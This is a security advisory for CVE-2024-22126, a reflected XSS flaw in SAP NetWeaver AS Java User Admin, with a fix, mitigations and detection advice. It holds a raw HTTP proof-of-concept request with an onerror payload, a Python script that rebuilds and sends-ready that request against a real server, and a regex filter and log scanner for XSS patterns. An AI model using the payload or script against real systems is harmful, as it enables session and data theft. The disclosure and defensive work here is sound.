Vahagn Vardanian

Co-founder and CTO of RedRays

[PoC] [Fixed] [CVE-2024-22126] Critical XSS Vulnerability Identified in SAP NetWeaver AS Java

Date of Release: February 13, 2024

Advisory ID: CVE-2024-22126

Affected Software: SAP NetWeaver Application Server for Java (AS Java) User Admin Application

Versions Affected: J2EE ENGINE APPLICATIONS 7.50, specifically:

  • SP026000005
  • SP027000003
  • SP028000003
  • SP029000000

Vulnerability Summary: A Cross-Site Scripting (XSS) vulnerability, CVE-2024-22126, was identified in the User Admin application of SAP NetWeaver AS for Java. It arises because incoming URL parameters are neither sufficiently validated nor properly encoded before being included in the redirect URL, so attacker-supplied markup is reflected into the page served to the user. The flaw is rated High (CVSS 8.8): the main impact is on confidentiality, with a lesser impact on integrity and availability.

CVSS Score: 8.8 (High)

PoC:

POST /useradmin/index.jsp HTTP/1.1
Host: SAP-Server:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

"><img src%3dx onerror%3dalert(1)>
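
The following is an added example, not RedRays' tooling or code from the original post. It rebuilds the PoC request above with the Content-Length computed from the body, and classifies a response as reflecting the payload unencoded (vulnerable), in encoded form (handled correctly) or not at all. The three responses are constructed for illustration; the meta-refresh markup and the `from` parameter name are assumptions, since the advisory does not show the vulnerable response or name the parameter.

```python
import html
from urllib.parse import quote

# Payload from the advisory's PoC body, with its %3d sequences URL-decoded.
PAYLOAD = '"><img src=x onerror=alert(1)>'
# The attribute/tag breakout; if these characters come back unescaped the
# injected <img> element is created and its onerror handler fires.
BREAKOUT = '"><img'


def build_poc_request(host: str, port: int = 50000) -> bytes:
    """Rebuild the advisory's PoC request with Content-Length computed from the body."""
    body = PAYLOAD.replace("=", "%3d").encode()  # '=' is %3d-encoded as in the advisory
    head = "\r\n".join([
        "POST /useradmin/index.jsp HTTP/1.1",
        f"Host: {host}:{port}",
        "User-Agent: Mozilla/5.0",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
    ])
    return head.encode() + b"\r\n\r\n" + body


def parse_response(raw: str):
    """Split a raw HTTP/1.1 response into (status_code, {header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(maxsplit=2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def classify_reflection(raw_response: str) -> str:
    """Classify how the server echoed PAYLOAD:
    'reflected-raw'      breakout sequence present verbatim -> not encoded, vulnerable
    'reflected-encoded'  payload present only in percent-/HTML-encoded form -> handled
    'not-reflected'      nothing from the payload came back
    """
    _status, headers, body = parse_response(raw_response)
    # The two places the value can surface: the redirect target in a Location
    # header and the rendered HTML (meta refresh, link, script). A raw breakout in
    # Location does not execute by itself, but it proves the value was placed in
    # the redirect URL without encoding, which is the defect the advisory describes.
    surfaces = [headers.get("location", ""), body]
    if any(BREAKOUT in s for s in surfaces):
        return "reflected-raw"
    # 'alert' survives both percent-encoding and HTML escaping, so it marks an
    # encoded reflection of the payload that did not match the breakout.
    if any("alert" in s.lower() for s in surfaces):
        return "reflected-encoded"
    return "not-reflected"


# Constructed sample responses (not captured from a real system). The meta-refresh
# form and the 'from' parameter name are assumptions used for illustration.
META = '<meta http-equiv="refresh" content="0;url=/useradmin/home.jsp?from={}">'
VULNERABLE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n" + META.format(PAYLOAD)
# Correct handling of a value that lands in a URL inside an HTML attribute:
# percent-encode it for the URL, then HTML-escape the result for the attribute.
PATCHED = ("HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
           + META.format(html.escape(quote(PAYLOAD, safe=""), quote=True)))
CLEAN = "HTTP/1.1 302 Found\r\nLocation: /useradmin/index.jsp\r\nContent-Length: 0\r\n\r\n"

if __name__ == "__main__":
    print(build_poc_request("SAP-Server").decode())
    for label, resp in [("vulnerable", VULNERABLE), ("patched", PATCHED), ("clean", CLEAN)]:
        print(f"{label}: {classify_reflection(resp)}")
```

To use it against a real system, send the bytes from build_poc_request() to the AS Java HTTP port and paste the raw response into classify_reflection(). Note that the PATCHED sample shows the two-layer encoding (URL encoding inside HTML attribute encoding) that a reflected redirect target needs; encoding for only one of the two contexts leaves a breakout possible.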

CVSS Vector (AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:L):

  • Attack Vector (AV): Network
  • Attack Complexity (AC): Low
  • Privileges Required (PR): None
  • User Interaction (UI): Required
  • Scope (S): Changed
  • Confidentiality Impact (C): High
  • Integrity Impact (I): Low
  • Availability Impact (A): Low

Symptom: An attacker crafts a link to the User Admin application carrying a malicious URL parameter. When a logged-in user opens it (user interaction is required), the parameter is reflected unencoded into the response and the injected script runs in the user's browser in the context of the SAP system. This can expose the user's session and personal data and, because the scope changes to the user's browser session, affects more than the vulnerable component itself.

Cause: The vulnerability is present on systems that have applied SAP Note 3251396; the URL-parameter handling for redirects introduced there does not adequately validate and encode the parameter values, allowing the reflected XSS.

Solution: Apply the corrective Support Package or patch listed in the “Validity” and “Support Packages & Patches” sections of the SAP Security Note for CVE-2024-22126. Before downloading Java objects, review SAP Note 1974464 on SCA Dependency Analysis to avoid deploying incompatible component versions.

Mitigation: Until the patch is applied, restrict network access to the /useradmin application (for example at the SAP Web Dispatcher or another reverse proxy) to administrator networks, and filter or alert on requests to it whose parameters contain HTML metacharacters (<, >, ") or event-handler attributes such as onerror=, keeping in mind that these arrive URL-encoded (the PoC encodes '=' as %3d). This reduces exposure but does not remove the flaw; only the patch does.
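
An added example of the interim filter described above, written for this page and not part of RedRays' platform or SAP's own tooling. It URL-decodes request parameters repeatedly (so the PoC's %3d encoding and double-encoded variants normalise to the same string), flags values containing tag/attribute breakout characters, inline event handlers or javascript: URLs, and runs the same check over access-log entries for the /useradmin path. The log lines are constructed, and the `target` parameter name is an assumption; the advisory does not name the vulnerable parameter.

```python
import re
from urllib.parse import parse_qsl, unquote_plus

# Tokens that have no business in a value the User Admin app reflects into a
# redirect URL: attribute/tag breakout characters, inline event handlers, and
# javascript: URLs.
SUSPICIOUS = re.compile(r'[<>"]|\bon\w+\s*=|javascript:', re.IGNORECASE)


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing, so %3d (as in the PoC) and
    double-encoded %253d both normalise to '='."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(query_or_body: str):
    """Return [(name, decoded_value)] for parameters that look like HTML injection.
    parse_qsl removes one encoding layer; fully_decode removes the rest.
    keep_blank_values=True makes a bare payload with no '=' (the PoC body has its
    '=' encoded as %3d) show up as a parameter name, so names are checked too."""
    hits = []
    for name, value in parse_qsl(query_or_body, keep_blank_values=True):
        name, value = fully_decode(name), fully_decode(value)
        if SUSPICIOUS.search(name) or SUSPICIOUS.search(value):
            hits.append((name, value))
    return hits


# Request line inside a common-log-format entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def scan_access_log(lines, path_prefix="/useradmin/"):
    """Return [(line_no, name, decoded_value)] for requests under path_prefix whose
    query string carries a suspicious parameter. Access logs only show the query
    string; a POST body like the PoC's is only visible to a filter that runs in
    front of the application (reverse proxy / WAF), where suspicious_params()
    can be applied to the body directly."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        if not path.startswith(path_prefix):
            continue
        for name, value in suspicious_params(query):
            findings.append((line_no, name, value))
    return findings


# Constructed sample log (not from a real system); the 'target' parameter name is
# an assumption, the advisory does not name the vulnerable parameter.
SAMPLE_LOG = """\
10.0.0.5 - - [13/Feb/2024:10:00:01 +0000] "GET /useradmin/index.jsp?target=%2Fuseradmin%2Fhome.jsp HTTP/1.1" 302 0
10.0.0.9 - - [13/Feb/2024:10:00:07 +0000] "GET /useradmin/index.jsp?target=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 1843
10.0.0.9 - - [13/Feb/2024:10:00:12 +0000] "GET /useradmin/index.jsp?target=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 1843
10.0.0.5 - - [13/Feb/2024:10:00:20 +0000] "GET /irj/portal?q=%3Cb%3Ehi HTTP/1.1" 200 77
"""

if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG.splitlines()):
        print("line %d: %s=%r" % finding)
    print(suspicious_params('"><img src%3dx onerror%3dalert(1)>'))
```

The path filter keeps the rule narrow: the last sample line carries the same kind of characters but targets a different application and is ignored, which is what you want for an interim rule aimed at one known-vulnerable endpoint. The character class is deliberately small (no single quote) to limit false positives on legitimate User Admin values; widen it only after checking what normal traffic to the application looks like.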

References:

  • SAP Security Note [CVE-2024-22126]
  • SAP Note 3251396
  • SAP Note 1974464

The signature of this vulnerability has been added to the RedRays Security Platform.
